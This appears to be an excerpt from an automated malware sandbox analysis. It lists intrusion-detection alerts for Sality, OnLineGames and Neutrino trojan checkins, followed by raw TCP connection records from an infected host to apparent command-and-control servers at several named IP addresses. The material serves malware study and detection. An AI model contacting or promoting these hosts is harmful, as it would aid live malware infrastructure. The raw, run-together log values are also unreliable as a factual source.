                                                                                                                                                                                                                                                                                          2024-10-18T12:43:55.528705+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950028190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:55.528705+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950028190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:57.133083+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950029185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:57.133083+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950029185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:01.393948+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950030190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:01.393948+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950030190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:01.393948+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950030190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:03.034471+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950032185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:03.034471+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950032185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:05.202534+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.950031194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:07.519217+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950033190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:07.519217+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950033190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:07.519217+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950033190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:09.073539+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950034185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:09.073539+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950034185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:13.364041+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950035190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:13.364041+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950035190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:13.364041+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950035190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:14.966939+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950036185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:14.966939+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950036185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:19.380085+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950037190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:19.380085+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950037190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:19.380085+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950037190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:20.972483+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950038185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:20.972483+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950038185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:25.769055+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950039190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:25.769055+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950039190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:25.769055+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950039190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:27.259821+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950040185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:27.259821+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950040185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:32.108634+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950041190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:32.108634+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950041190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:32.108634+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950041190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:34.003474+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950042185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:34.003474+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950042185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:38.544056+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950043190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:38.544056+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950043190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:38.544056+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950043190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:40.244422+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950044185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:40.244422+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950044185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:44.568350+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950045190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:44.568350+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950045190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:44.568350+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950045190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:47.270315+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950046185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:47.270315+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950046185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:51.551466+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950048190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:51.551466+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950048190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:51.551466+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950048190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:53.017759+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.950047194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:53.223461+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950049185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:53.223461+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950049185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:57.651692+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950050190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:57.651692+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950050190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:57.651692+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950050190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:59.153333+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950051185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:44:59.153333+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950051185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:03.284445+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950052190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:03.284445+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950052190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:03.284445+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950052190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:04.962592+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950053185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:04.962592+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950053185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:09.512490+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950054190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:09.512490+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950054190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:09.512490+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950054190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:11.224026+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950055185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:11.224026+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950055185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:17.699821+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950057185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:17.699821+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950057185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:23.641333+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950059185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:23.641333+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950059185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:29.317116+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950061185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:29.317116+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950061185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:36.073156+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950064185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:36.073156+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950064185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:38.986659+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.950063194.5.152.21580TCP

                                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.797486067 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.812968016 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.815403938 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.815658092 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.831522942 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964721918 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964740992 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964755058 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964934111 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.975220919 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.891947031 CEST497098080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.926100016 CEST808049709190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.926373959 CEST497098080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.927814960 CEST497098080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.934643984 CEST808049709190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:39.935483932 CEST497098080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.208328009 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.208508968 CEST4971280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.215116978 CEST8049712185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.215146065 CEST8049707185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.215977907 CEST4971280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.216084003 CEST4970780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.216442108 CEST4971280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.227605104 CEST8049712185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392676115 CEST8049712185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392776012 CEST8049712185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392790079 CEST8049712185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.407737017 CEST4971280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:42.121105909 CEST497138080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:42.158437014 CEST808049713190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:42.158603907 CEST497138080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.308888912 CEST4971280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.309292078 CEST497138080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.254085064 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.264017105 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.264127970 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.271367073 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.276635885 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368335962 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368405104 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368809938 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368823051 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368853092 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368865967 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.369576931 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.369623899 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.381620884 CEST497198080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.386888981 CEST808049719190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.386981964 CEST497198080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.387331009 CEST497198080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.393112898 CEST808049719190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:53.402228117 CEST497198080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.338845968 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.339137077 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.345889091 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.345961094 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.347297907 CEST8049716185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.347371101 CEST4971680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.357119083 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.362607956 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419142008 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419203997 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419325113 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419339895 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419364929 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419397116 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.430495977 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.435798883 CEST808049722190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.435863018 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.460707903 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.466573954 CEST808049722190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.701402903 CEST497228080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.415596962 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.415884018 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.420747042 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.420811892 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421020031 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421087980 CEST8049721185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421144009 CEST4972180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.425781012 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531562090 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531630993 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531630993 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531642914 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531670094 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531681061 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.714550972 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.720920086 CEST808049724190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.721206903 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.726022005 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.730875969 CEST808049724190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.031030893 CEST497248080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.498114109 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.498550892 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.503448963 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.503621101 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.504462957 CEST8049723185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.504525900 CEST4972380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.535890102 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.540817976 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602833033 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602885962 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602900028 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602989912 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602989912 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.645944118 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.650979042 CEST808049726190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.651221037 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.652932882 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.657850981 CEST808049726190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.645323038 CEST497268080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.144567966 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.144908905 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.149842024 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.149909019 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.151118040 CEST8049725185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.151175976 CEST4972580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.168298960 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.173223972 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239604950 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239654064 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239662886 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239674091 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239675999 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239726067 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239736080 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.258826971 CEST497288080192.168.2.9190.120.227.91
